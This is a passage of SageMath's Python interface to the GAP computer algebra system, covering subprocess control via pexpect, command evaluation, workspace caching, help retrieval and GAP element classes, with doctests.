# GAP oddity: If a computation is running and we send Ctrl-C,
# it is stopped as expected. But if we are at the idle prompt,
# nothing is happening UNTIL we run the next command (which is
# then immediately interrupted).
# There is apparently also a race in GAP between the signal
# handler and input, if we don't wait a bit the result is
# unpredictable.
E.sendline(chr(3))
time.sleep(0.1)
E.sendline()
try:
# send a dummy command
E.sendline('224433409;')
# read everything up to the actual output of the command
E.expect(r'@[nf][@J\s>]*224433409', timeout=timeout)
E.send(' ')
# the following input prompt should be the current input
# prompt but GAP might be too confused to display it
# E.expect('@i', timeout=timeout)
# Ideally, we would be finished here. But sometimes GAP
# thinks it is still inside a do/od block. So we run some
# more plain commands to get back into sync. These might
# either complete successfully (output "@n+<number>") or
# return a "Syntax error: od expected@J@f +<number>"
E.sendline()
time.sleep(0.1)
E.sendline('224433437;')
E.expect(r'@[nf][@J\s>]*224433437', timeout=timeout)
E.sendline()
time.sleep(0.1)
E.sendline('224433479;')
E.expect(r'@[nf][@J\s>]*224433479', timeout=timeout)
E.send(' ')
# the following input prompt is now the current input prompt
E.expect('@i', timeout=timeout)
success = True
except (pexpect.TIMEOUT, pexpect.EOF):
# GAP died or hangs indefinitely
success = False
if not success and quit_on_fail:
self.quit()
return success
def _assign_symbol(self):
r"""
Return the assign symbol in GAP.
TESTS::
sage: gap = Gap()
sage: print(gap._assign_symbol())
:=
"""
return ":="
def _quit_string(self):
"""
Returns the string used to quit GAP.
EXAMPLES::
sage: gap._quit_string()
'quit;'
::
sage: g = Gap()
sage: a = g(2); g.is_running()
True
sage: g.quit()
sage: g.is_running()
False
"""
return 'quit;'
def _read_in_file_command(self, filename):
r"""
Returns the command use to read in a file in GAP.
EXAMPLES::
sage: gap._read_in_file_command('test')
'Read("test");'
::
sage: filename = tmp_filename()
sage: with open(filename, 'w') as f:
....: _ = f.write('xx := 22;\n')
sage: gap.read(filename)
sage: gap.get('xx').strip()
'22'
"""
return 'Read("%s");' % filename
def _continuation_prompt(self):
"""
Returns the continuation prompt in GAP.
EXAMPLES::
sage: gap._continuation_prompt()
'> '
"""
return '> '
def load_package(self, pkg, verbose=False):
"""
Load the Gap package with the given name.
If loading fails, raise a RuntimeError exception.
TESTS::
sage: gap.load_package("chevie")
Traceback (most recent call last):
...
RuntimeError: Error loading Gap package chevie. You may want to install gap_packages SPKG.
"""
if verbose:
print("Loading GAP package {}".format(pkg))
x = self.eval('LoadPackage("{}")'.format(pkg))
if x == 'fail':
raise RuntimeError("Error loading Gap package "+str(pkg)+". "+
"You may want to install gap_packages SPKG.")
def eval(self, x, newlines=False, strip=True, split_lines=True, **kwds):
r"""
Send the code in the string s to the GAP interpreter and return the
output as a string.
INPUT:
- ``s`` - string containing GAP code.
- ``newlines`` - bool (default: True); if False,
remove all backslash-newlines inserted by the GAP output
formatter.
- ``strip`` - ignored
- ``split_lines`` -- bool (default: True); if True then each
line is evaluated separately. If False, then the whole
block of code is evaluated all at once.
EXAMPLES::
sage: gap.eval('2+2')
'4'
sage: gap.eval('Print(4); #test\n Print(6);')
'46'
sage: gap.eval('Print("#"); Print(6);')
'#6'
sage: gap.eval('4; \n 6;')
'4\n6'
sage: gap.eval('if 3>2 then\nPrint("hi");\nfi;')
'hi'
sage: gap.eval('## this is a test\nPrint("OK")')
'OK'
sage: gap.eval('Print("This is a test. Oh no, a #");# but this is a comment\nPrint("OK")')
'This is a test. Oh no, a #OK'
sage: gap.eval('if 4>3 then')
''
sage: gap.eval('Print("Hi how are you?")')
'Hi how are you?'
sage: gap.eval('fi')
''
TESTS:
Whitespace is not stripped from the front of the result
(:trac:`28439`)::
sage: gap.eval(r'Print(" -\n\\\\- ")')
' -\n\\\\-'
"""
# '"
#We remove all of the comments: On each line, we try
#to find a pound sign. If we find it, we check to see if
#it is occurring in a string. If it is not in a string, we
#strip off the comment.
if not split_lines:
input_line=str(x)
else:
input_line = ""
for line in str(x).rstrip().split('\n'):
pound_position = line.find('#')
while pound_position != -1:
if not is_in_string(line, pound_position):
line = line[:pound_position]
pound_position = line.find('#',pound_position+1)
input_line += " "+line
if not input_line.endswith(';'):
input_line += ';'
result = Expect.eval(self, input_line, **kwds)
if not newlines:
result = result.replace("\\\n","")
return result.rstrip()
def _execute_line(self, line, wait_for_prompt=True, expect_eof=False):
if self._expect is None: # interface is down
self._start()
E = self._expect
try:
if len(line) > 4095:
raise RuntimeError("Passing commands this long to gap would hang")
E.sendline(line)
except OSError:
raise RuntimeError("Error evaluating %s in %s"%(line, self))
if not wait_for_prompt:
return (b'',b'')
if len(line)==0:
return (b'',b'')
try:
terminal_echo = [] # to be discarded
normal_outputs = [] # GAP stdout
error_outputs = [] # GAP stderr
current_outputs = terminal_echo
while True:
x = E.expect_list(self._compiled_full_pattern)
current_outputs.append(E.before)
if x == 0: # @p
if E.after != b'@p1.':
warnings.warn(
"possibly wrong version of GAP package "
"interface. Crossing fingers and continuing.")
elif x == 1: #@@
current_outputs.append(b'@')
elif x == 2: #special char
c = ord(E.after[1:2]) - ord(b'A') + 1
s = bytes([c])
current_outputs.append(s)
elif x == 3: # garbage collection info, ignore
pass
elif x == 4: # @e -- break loop
E.sendline("quit;")
elif x == 5: # @c completion, doesn't seem to happen when -p is in use
warnings.warn("I didn't think GAP could do this")
elif x == 6: # @f GAP error message
current_outputs = error_outputs;
elif x == 7: # @h help text, but this stopped happening with new help
warnings.warn("I didn't think GAP could do this")
elif x == 8: # @i awaiting normal input
break;
elif x == 9: # @m finished running a child
pass # there is no need to do anything
elif x==10: #@n normal output line
current_outputs = normal_outputs;
elif x==11: #@r echoing input
current_outputs = terminal_echo
elif x==12: #@sN shouldn't happen
warnings.warn("this should never happen")
elif x==13: #@w GAP is trying to send a Window command
warnings.warn("this should never happen")
elif x ==14: #@x seems to be safely ignorable
pass
elif x == 15:#@z GAP starting a subprocess
pass # there is no need to do anything
except pexpect.EOF:
if not expect_eof:
raise RuntimeError("Unexpected EOF from %s executing %s"%(self,line))
except IOError:
raise RuntimeError("IO Error from %s executing %s"%(self,line))
return (b"".join(normal_outputs), b"".join(error_outputs))
def _keyboard_interrupt(self):
"""
TESTS:
We check that the gap interface behaves correctly after an
interrupt::
sage: gap(2)
2
sage: try:
....: alarm(0.5)
....: gap.eval('while(1=1) do i:=1;; od;', wait_for_prompt=True)
....: except KeyboardInterrupt:
....: pass
sage: gap(2)
2
"""
self.quit()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def _eval_line(self, line, allow_use_file=True, wait_for_prompt=True, restart_if_needed=True):
r"""
Evaluate a line of commands.
REMARK:
By default, a long command (length exceeding ``self._eval_using_file_cutoff``)
is evaluated using :meth:`_eval_line_using_file`.
If the command can not be evaluated since the interface
has crashed, it is automatically restarted and tried
again *once*.
If the optional ``wait_for_prompt`` is ``False`` then even a very long line
will not be evaluated by :meth:`_eval_line_using_file`, since this does not
support the ``wait_for_prompt`` option.
INPUT:
- ``line`` -- (string) a command.
- ``allow_use_file`` (optional bool, default ``True``) --
allow to evaluate long commands using :meth:`_eval_line_using_file`.
- ``wait_for_prompt`` (optional bool, default ``True``) --
wait until the prompt appears in the sub-process' output.
- ``restart_if_needed`` (optional bool, default ``True``) --
If it is ``True``, the command evaluation is evaluated
a second time after restarting the interface, if an
``EOFError`` occured.
TESTS::
sage: gap._eval_line('2+2;')
'4'
We test the ``wait_for_prompt`` option by sending a command that
creates an infinite loop in the GAP sub-process. But if we don't
wait for the prompt to appear in the output, we can interrupt
the loop without raising a KeyboardInterrupt. At the same time,
we test that the line is not forwarded to :meth:`_eval_line_using_file`,
since that method would not support the ``wait_for_prompt`` option::
sage: cutoff = gap._eval_using_file_cutoff
sage: gap._eval_using_file_cutoff = 4
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: gap._eval_using_file_cutoff = cutoff
The following tests against a bug fixed at :trac:`10296`::
sage: gap(3)
3
sage: gap.eval('quit;')
''
sage: a = gap(3)
** Gap crashed or quit executing '\$sage...:=3;;' **
Restarting Gap and trying again
sage: a
3
"""
expect_eof = self._quit_string() in line
try:
if self._expect is None:
self._start()
if allow_use_file and wait_for_prompt and len(line) > self._eval_using_file_cutoff:
return self._eval_line_using_file(line)
(normal, error) = self._execute_line(line, wait_for_prompt=wait_for_prompt,
expect_eof=expect_eof)
# The internal method _execute_line returns bytes but the bytes it
# returns should contain text (any terminal commands and other
# garbage should be filtered out by this point); here we decode
# them (on Python 3), currently just using the default encoding
normal, error = bytes_to_str(normal), bytes_to_str(error)
if len(error):
if 'Error, Rebuild completion files!' in error:
error += "\nRunning gap_reset_workspace()..."
self.quit()
gap_reset_workspace()
error = error.replace('\r','')
raise RuntimeError("%s produced error output\n%s\n executing %s"%(self, error,line))
if not len(normal):
return ''
if isinstance(wait_for_prompt, str) and normal.ends_with(wait_for_prompt):
n = len(wait_for_prompt)
elif normal.endswith(bytes_to_str(self._prompt)):
n = len(self._prompt)
elif normal.endswith(self._continuation_prompt()):
n = len(self._continuation_prompt())
else:
n = 0
out = normal[:-n]
if len(out) and out[-1] == "\n":
out = out[:-1]
return out
except (RuntimeError, TypeError, pexpect.ExceptionPexpect) as exc:
if not self._isalive():
# We can't distinguish just EOF from an unexpectedly killed
# process because pexpect catches EOF's and re-reraises them
# But if we *were* expecting EOF then we should just let it
# fail silently and return
if expect_eof:
return ''
print("** %s crashed or quit executing '%s' **" % (self, line))
print("Restarting %s and trying again" % self)
self._start()
if line != '':
return self._eval_line(line, allow_use_file=allow_use_file)
else:
return ''
else:
raise RuntimeError(exc)
except KeyboardInterrupt:
self._keyboard_interrupt()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def unbind(self, var):
"""
Clear the variable named var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
sage: gap.unbind('x')
sage: gap.get('x')
Traceback (most recent call last):
...
RuntimeError: Gap produced error output
Error, Variable: 'x' must have a value
...
"""
self.eval('Unbind(%s)'%var)
self.clear(var)
def _contains(self, v1, v2):
"""
EXAMPLES::
sage: Integers = gap('Integers')
sage: two = gap(2)
sage: gap._contains(two.name(), Integers.name())
True
::
sage: 2 in gap('Integers')
True
"""
return self.eval('%s in %s'%(v1,v2)) == "true"
def _true_symbol(self):
"""
Returns the symbol for truth in GAP.
EXAMPLES::
sage: gap._true_symbol()
'true'
sage: gap(2) == gap(2)
True
"""
return "true"
def _false_symbol(self):
"""
Returns the symbol for falsity in GAP.
EXAMPLES::
sage: gap._false_symbol()
'false'
sage: gap(2) == gap(3)
False
"""
return "false"
def _equality_symbol(self):
"""
Returns the symbol for equality in GAP.
EXAMPLES::
sage: gap._equality_symbol()
'='
sage: gap(2) == gap(3)
False
sage: gap(2) == gap(2)
True
"""
return "="
def version(self):
"""
Returns the version of GAP being used.
EXAMPLES::
sage: print(gap.version())
4...
"""
return self.eval('VERSION')[1:-1]
def function_call(self, function, args=None, kwds=None):
"""
Calls the GAP function with args and kwds.
EXAMPLES::
sage: gap.function_call('SymmetricGroup', [5])
SymmetricGroup( [ 1 .. 5 ] )
If the GAP function does not return a value, but prints something
to the screen, then a string of the printed output is returned.
::
sage: s = gap.function_call('Display', [gap.SymmetricGroup(5).CharacterTable()])
sage: type(s)
<class 'sage.interfaces.interface.AsciiArtString'>
sage: s.startswith('CT')
True
TESTS:
If the function call is too long, two ``gap.eval`` calls are made
since returned values from commands in a file cannot be handled
properly::
sage: g = Gap()
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_very_very_very_long_name'))
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
When the command itself is so long that it warrants use of a temporary
file to be communicated to GAP, this does not cause problems since
the file will contain a single command::
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_name_so_very_very_very_long_that_even_by_itself_will_make_expect_use_a_file'))
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
"""
args, kwds = self._convert_args_kwds(args, kwds)
self._check_valid_function_name(function)
#Here we have to do some magic because not all GAP
#functions return a value. If you try to store their
#results to a variable, then GAP will complain. Thus, before
#we evaluate the function, we make it so that the marker string
#is in the 'last' variable in GAP. If the function returns a
#value, then that value will be in 'last', otherwise it will
#be the marker.
marker = '__SAGE_LAST__:="__SAGE_LAST__";;'
cmd = "%s(%s);;"%(function, ",".join([s.name() for s in args]+
['%s=%s'%(key,value.name()) for key, value in kwds.items()]))
if len(marker) + len(cmd) <= self._eval_using_file_cutoff:
# We combine the two commands so we only run eval() once and the
# only output would be from the second command
res = self.eval(marker+cmd)
else:
self.eval(marker)
res = self.eval(cmd)
if self.eval(self._identical_function + '(last,__SAGE_LAST__)') != 'true':
return self.new('last2;')
else:
if res.strip():
from sage.interfaces.interface import AsciiArtString
return AsciiArtString(res)
def get_record_element(self, record, name):
r"""
Return the element of a GAP record identified by ``name``.
INPUT:
- ``record`` -- a GAP record
- ``name`` -- str
OUTPUT:
- :class:`GapElement`
EXAMPLES::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: gap.get_record_element(rec, 'a')
1
sage: gap.get_record_element(rec, 'b')
2
TESTS::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: type(gap.get_record_element(rec, 'a'))
<class 'sage.interfaces.gap.GapElement'>
"""
return self('%s.%s' % (record.name(), name))
# We need to inherit from ModuleElement to support
# sage.structure.coerce_actions.ModuleAction and it needs to be first
# in the MRO because extension types should always come first.
@instancedoc
class GapElement_generic(ModuleElement, ExtraTabCompletion, ExpectElement):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
def _add_(self, other):
"""
EXAMPLES::
sage: a = gap(1)
sage: a + a
2
"""
# This is just a copy of ExpectElement._add_ to fix the fact
# that the abtract method ModuleElement._add_ comes first in
# the MRO.
return self._operation("+", other)
def __bool__(self):
"""
EXAMPLES::
sage: bool(gap(2))
True
sage: gap(0).bool()
False
sage: gap('false').bool()
False
"""
P = self._check_valid()
return self != P(0) and repr(self) != 'false'
__nonzero__ = __bool__
def __len__(self):
"""
EXAMPLES::
sage: v = gap('[1,2,3]'); v
[ 1, 2, 3 ]
sage: len(v)
3
len is also called implicitly by if::
sage: if gap('1+1 = 2'):
....: print("1 plus 1 does equal 2")
1 plus 1 does equal 2
::
sage: if gap('1+1 = 3'):
....: print("it is true")
....: else:
....: print("it is false")
it is false
"""
P = self.parent()
if P.eval('%s = true'%self.name()) == 'true':
return 1
elif P.eval('%s = false'%self.name()) == 'true':
return 0
else:
return int(self.Length())
def is_string(self):
"""
Tell whether this element is a string.
EXAMPLES::
sage: gap('"abc"').is_string()
True
sage: gap('[1,2,3]').is_string()
False
"""
return bool(self.IsString())
def _matrix_(self, R):
r"""
Return matrix over the (Sage) ring R determined by self, where self
should be a Gap matrix.
EXAMPLES::
sage: s = gap("(Z(7)^0)*[[1,2,3],[4,5,6]]"); s
[ [ Z(7)^0, Z(7)^2, Z(7) ], [ Z(7)^4, Z(7)^5, Z(7)^3 ] ]
sage: s._matrix_(GF(7))
[1 2 3]
[4 5 6]
::
sage: s = gap("[[1,2], [3/4, 5/6]]"); s
[ [ 1, 2 ], [ 3/4, 5/6 ] ]
sage: m = s._matrix_(QQ); m
[ 1 2]
[3/4 5/6]
sage: parent(m)
Full MatrixSpace of 2 by 2 dense matrices over Rational Field
::
sage: s = gap('[[Z(16),Z(16)^2],[Z(16)^3,Z(16)]]')
sage: s._matrix_(GF(16,'a'))
[ a a^2]
[a^3 a]
"""
v = self.DimensionsMat()
n = int(v[1])
m = int(v[2])
from sage.matrix.matrix_space import MatrixSpace
M = MatrixSpace(R, n, m)
entries = [[R(self[r,c]) for c in range(1,m+1)] for r in range(1,n+1)]
return M(entries)
############
class Gap(Gap_generic):
r"""
Interface to the GAP interpreter.
AUTHORS:
- William Stein and David Joyner
"""
def __init__(self, max_workspace_size=None,
maxread=None, script_subdirectory=None,
use_workspace_cache=True,
server=None,
server_tmpdir=None,
logfile=None,
seed=None,
env={}):
"""
EXAMPLES::
sage: gap == loads(dumps(gap))
True
"""
self.__use_workspace_cache = use_workspace_cache
cmd, self.__make_workspace = gap_command(use_workspace_cache, server is None)
# -b: suppress banner
# -p: enable "package output mode"; this confusingly named option
# causes GAP to output special control characters that are normally
# intended for communication with a window manager (i.e. for xgap)
# but that we also use to control GAP with pexepect
# -T: disable interactive break loop when encountering errors
# -E: disable readline support
cmd += " -b -p -T -E"
if max_workspace_size is None:
max_workspace_size = _get_gap_memory_pool_size_MB()
cmd += ' -o ' + str(max_workspace_size)
cmd += ' -s ' + str(max_workspace_size)
cmd += ' -m 64m ' # attempt at a workaround for http://tracker.gap-system.org/issues/224
cmd += ' ' + os.path.join(SAGE_EXTCODE, 'gap', 'sage.g')
Expect.__init__(self,
name='gap',
prompt='gap> ',
command=cmd,
maxread=maxread,
server=server,
server_tmpdir=server_tmpdir,
script_subdirectory=script_subdirectory,
restart_on_ctrlc=True,
verbose_start=False,
logfile=logfile,
eval_using_file_cutoff=100,
env=env)
self.__seq = 0
self._seed = seed
def set_seed(self,seed=None):
"""
Set the seed for gap interpreter.
The seed should be an integer.
EXAMPLES::
sage: g = Gap()
sage: g.set_seed(0)
0
sage: [g.Random(1,10) for i in range(5)]
[2, 3, 3, 4, 2]
"""
if seed is None:
seed = self.rand_seed()
self.eval("Reset(GlobalMersenneTwister,%d);;" % seed)
self.eval("Reset(GlobalRandomSource,%d);;" % seed)
self._seed = seed
return seed
def __reduce__(self):
"""
EXAMPLES::
sage: gap.__reduce__()
(<function reduce_load_GAP at 0x...>, ())
sage: f, args = _
sage: f(*args)
Gap
"""
return reduce_load_GAP, tuple([])
def _next_var_name(self):
r"""
Returns the next unused variable name.
Note that names starting with dollar signs are valid GAP
identifiers, but need to be escaped with a backslash starting
with GAP-4.8.
EXAMPLES::
sage: g = Gap()
sage: g._next_var_name()
'\\$sage1'
sage: g(2)^2
4
sage: g._next_var_name()
'\\$sage...'
"""
if len(self._available_vars) != 0:
v = self._available_vars[0]
del self._available_vars[0]
return v
self.__seq += 1
return r'\$sage%s'%self.__seq
def _start(self):
"""
EXAMPLES::
sage: g = Gap()
sage: g.is_running()
False
sage: g._start()
sage: g.is_running()
True
sage: g.quit()
"""
if self.__use_workspace_cache:
from sage.libs.gap.saved_workspace import timestamp
try:
# Check to see if we need to auto-regenerate the gap
# workspace, i.e., if the gap script is more recent
# than the saved workspace, which signals that gap has
# been upgraded.
if os.path.getmtime(WORKSPACE) < timestamp():
raise OSError("GAP workspace too old")
# Set the modification time of the workspace to the
# current time. This ensures the workspace doesn't
# get deleted too soon by gap_reset_workspace().
os.utime(WORKSPACE, None)
except OSError:
gap_reset_workspace(verbose=False)
global first_try
n = self._session_number
try:
Expect._start(self, "Failed to start GAP.")
except Exception:
if self.__use_workspace_cache and first_try:
first_try = False
self.quit()
gap_reset_workspace(verbose=False)
Expect._start(self, "Failed to start GAP.")
self._session_number = n
self.__make_workspace = False
else:
raise
if self.__use_workspace_cache and self.__make_workspace:
self.save_workspace()
# Now, as self._expect exists, we can compile some useful pattern:
self._compiled_full_pattern = self._expect.compile_pattern_list([
r'@p\d+\.','@@','@[A-Z]',r'@[123456!"#$%&][^+]*\+',
'@e','@c','@f','@h','@i','@m','@n','@r',r'@s\d',r'@w.*\+','@x','@z'])
# read everything up to the first "ready" prompt
self._expect.expect("@i")
# set random seed
self.set_seed(self._seed)
def _function_class(self):
"""
Returns the GapFunction class.
EXAMPLES::
sage: gap._function_class()
<class 'sage.interfaces.gap.GapFunction'>
::
sage: type(gap.Order)
<class 'sage.interfaces.gap.GapFunction'>
"""
return GapFunction
def cputime(self, t=None):
r"""
Returns the amount of CPU time that the GAP session has used. If
``t`` is not None, then it returns the difference
between the current CPU time and ``t``.
EXAMPLES::
sage: t = gap.cputime()
sage: t #random
0.13600000000000001
sage: gap.Order(gap.SymmetricGroup(5))
120
sage: gap.cputime(t) #random
0.059999999999999998
"""
if t is not None:
return self.cputime() - t
else:
self.eval('_r_ := Runtimes();')
r = sum(eval(self.eval('[_r_.user_time, _r_.system_time, _r_.user_time_children, _r_.system_time_children]')))
return r/1000.0
def save_workspace(self):
r"""
Save the GAP workspace.
TESTS:
We make sure that :trac:`9938` (GAP does not start if the path
to the GAP workspace file contains more than 82 characters) is
fixed::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = os.path.join(SAGE_TMP, "gap" + "0"*(80-len(SAGE_TMP)))
sage: gap = Gap()
sage: gap('3+2') # long time (4s on sage.math, 2013)
5
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
prepare_workspace_dir()
# According to the GAP Reference Manual,
# [http://www.gap-system.org/Manuals/doc/htm/ref/CHAP003.htm#SSEC011.1]
# SaveWorkspace can only be used at the main gap> prompt. It cannot
# be included in the body of a loop or function, or called from a
# break loop.
from sage.misc.temporary_file import atomic_write
with atomic_write(WORKSPACE) as f:
f.close()
self.eval('SaveWorkspace("%s");'%(f.name), allow_use_file=False)
# Todo -- this -- but there is a tricky "when does it end" issue!
# Maybe do via a file somehow?
def help(self, s, pager=True):
"""
Print help on a given topic.
EXAMPLES:
Note: In order to ensure consistent unicode handling from GAP we
start a GAP instance with a forced UTF-8 locale::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.help('SymmetricGroup', pager=False))
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
<BLANKLINE>
"""
tmp_to_use = self._local_tmpfile()
if self.is_remote():
tmp_to_use = self._remote_tmpfile()
else:
tmp_to_use = self._local_tmpfile()
self.eval('SetGAPDocTextTheme("none")')
gap_encoding = str(self('GAPInfo.TermEncoding;'))
self.eval(r'\$SAGE.tempfile := "%s";' % tmp_to_use)
line = Expect.eval(self, "? %s" % s)
Expect.eval(self, "? 1")
match = re.search(r"Page from (\d+)", line)
if match is None:
print(line)
else:
(sline,) = match.groups()
sline = int(sline) - 1
if self.is_remote():
self._get_tmpfile()
with io.open(self._local_tmpfile(), "r",
encoding=gap_encoding) as fobj:
help = fobj.read()
if pager:
from IPython.core.page import page
page(help, start=sline)
else:
# Find the n-th line and return from there
idx = -1
while sline:
try:
idx = help.find('\n', idx + 1)
sline -= 1
except ValueError:
# We ran out of lines early somehow; this shouldn't
# happen though
break
return help[idx:]
def set(self, var, value):
"""
Set the variable var to the given value.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
cmd = ('%s:=%s;;' % (var, value)).replace('\n','')
self._eval_line(cmd, allow_use_file=True)
def get(self, var, use_file=False):
"""
Get the string representation of the variable var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
if use_file:
tmp = self._local_tmpfile()
if os.path.exists(tmp):
os.unlink(tmp)
self.eval('PrintTo("%s", %s);'%(tmp,var), strip=False)
with open(tmp) as f:
r = f.read()
r = r.strip().replace("\\\n","")
os.unlink(tmp)
return r
else:
return self.eval('Print(%s);'%var, newlines=False)
def _pre_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StartInteract();')
def _post_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StopInteract();')
def _eval_line_using_file(self, line):
i = line.find(':=')
if i != -1:
j = line.find('"')
if j >= 0 and j < i:
i = -1
if i == -1:
line0 = 'Print( %s );'%line.rstrip().rstrip(';')
try: # this is necessary, since Print requires something as input, and some functions (e.g., Read) return nothing.
return Expect._eval_line_using_file(self, line0)
except RuntimeError:
return ''
return Expect._eval_line_using_file(self, line)
def console(self):
"""
Spawn a new GAP command-line session.
EXAMPLES::
sage: gap.console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * http://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
"""
gap_console()
def _object_class(self):
"""
Returns the GapElement class.
EXAMPLES::
sage: gap._object_class()
<class 'sage.interfaces.gap.GapElement'>
sage: type(gap(2))
<class 'sage.interfaces.gap.GapElement'>
"""
return GapElement
def _function_element_class(self):
"""
Returns the GapFunctionElement class.
EXAMPLES::
sage: gap._function_element_class()
<class 'sage.interfaces.gap.GapFunctionElement'>
sage: type(gap.SymmetricGroup(4).Order)
<class 'sage.interfaces.gap.GapFunctionElement'>
"""
return GapFunctionElement
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: '{}' in gap._tab_completion()
False
sage: c = gap._tab_completion()
sage: len(c) > 100
True
sage: 'Order' in c
True
"""
names = eval(self.eval('NamesSystemGVars()')) + \
eval(self.eval('NamesUserGVars()'))
return [n for n in names if n[0] in string.ascii_letters]
############
def gap_reset_workspace(max_workspace_size=None, verbose=False):
r"""
Call this to completely reset the GAP workspace, which is used by
default when Sage first starts GAP.
The first time you start GAP from Sage, it saves the startup state
of GAP in a file ``$HOME/.sage/gap/workspace-gap-HASH``, where ``HASH``
is a hash of the directory where Sage is installed.
This is useful, since then subsequent startup of GAP is at least 10
times as fast. Unfortunately, if you install any new code for GAP,
it won't be noticed unless you explicitly load it, e.g., with
gap.load_package("my_package")
The packages sonata, guava, factint, gapdoc, grape, design, toric,
and laguna are loaded in all cases before the workspace is saved,
if they are available.
TESTS:
Check that the race condition from :trac:`14242` has been fixed.
We temporarily need to change the worksheet filename. ::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = tmp_filename()
sage: from multiprocessing import Process
sage: import time
sage: gap = Gap() # long time (reset GAP session)
sage: P = [Process(target=gap, args=("14242",)) for i in range(4)]
sage: for p in P: # long time, indirect doctest
....: p.start()
....: time.sleep(float(0.2))
sage: for p in P: # long time
....: p.join()
sage: os.unlink(sage.interfaces.gap.WORKSPACE) # long time
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
# Create new workspace with filename WORKSPACE
g = Gap(use_workspace_cache=False, max_workspace_size=None)
g.eval('SetUserPreference("HistoryMaxLines", 30)')
from sage.tests.gap_packages import all_installed_packages
for pkg in all_installed_packages(gap=g):
try:
g.load_package(pkg, verbose=verbose)
except RuntimeError as msg:
if verbose:
print('*** %s' % msg)
# end for
g.save_workspace()
g.quit()
@instancedoc
class GapElement(GapElement_generic):
def __getitem__(self, n):
"""
EXAMPLES::
sage: a = gap([1,2,3])
sage: a[1]
1
"""
self._check_valid()
if not isinstance(n, tuple):
return self.parent().new('%s[%s]'%(self._name, n))
else:
return self.parent().new('%s%s'%(self._name, ''.join(['[%s]'%x for x in n])))
def str(self, use_file=False):
"""
EXAMPLES::
sage: print(gap(2))
2
"""
if use_file:
P = self._check_valid()
return P.get(self.name(), use_file=True)
else:
return repr(self)
def _latex_(self):
r"""
EXAMPLES::
sage: s = gap("[[1,2], [3/4, 5/6]]")
sage: latex(s)
\left(\begin{array}{rr} 1&2\\ 3/4&\frac{5}{6}\\ \end{array}\right)
"""
P = self._check_valid()
try:
s = P.eval('LaTeXObj(%s)'%self.name())
s = s.replace('\\\\','\\').replace('"','')
s = s.replace('%\\n',' ')
return s
except RuntimeError:
return str(self)
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: s5 = gap.SymmetricGroup(5)
sage: 'Centralizer' in s5._tab_completion()
True
"""
P = self.parent()
v = P.eval(r'\$SAGE.OperationsAdmittingFirstArgument(%s)'%self.name())
v = v.replace('Tester(','').replace('Setter(','').replace(')','').replace('\n', '')
v = v.split(',')
v = [ oper.split('"')[1] for oper in v ]
v = [ oper for oper in v if all(ch in string.ascii_letters for ch in oper) ]
return sorted(set(v))
@instancedoc
class GapFunctionElement(FunctionElement):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap(4).SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._obj.parent()
help = M.help(self._name, pager=False)
return help
@instancedoc
class GapFunction(ExpectFunction):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._parent
help = M.help(self._name, pager=False)
return help
def is_GapElement(x):
"""
Returns True if x is a GapElement.
EXAMPLES::
sage: from sage.interfaces.gap import is_GapElement
sage: is_GapElement(gap(2))
True
sage: is_GapElement(2)
False
"""
return isinstance(x, GapElement)
def gfq_gap_to_sage(x, F):
"""
INPUT:
- ``x`` -- GAP finite field element
- ``F`` -- Sage finite field
OUTPUT: element of ``F``
EXAMPLES::
sage: x = gap('Z(13)')
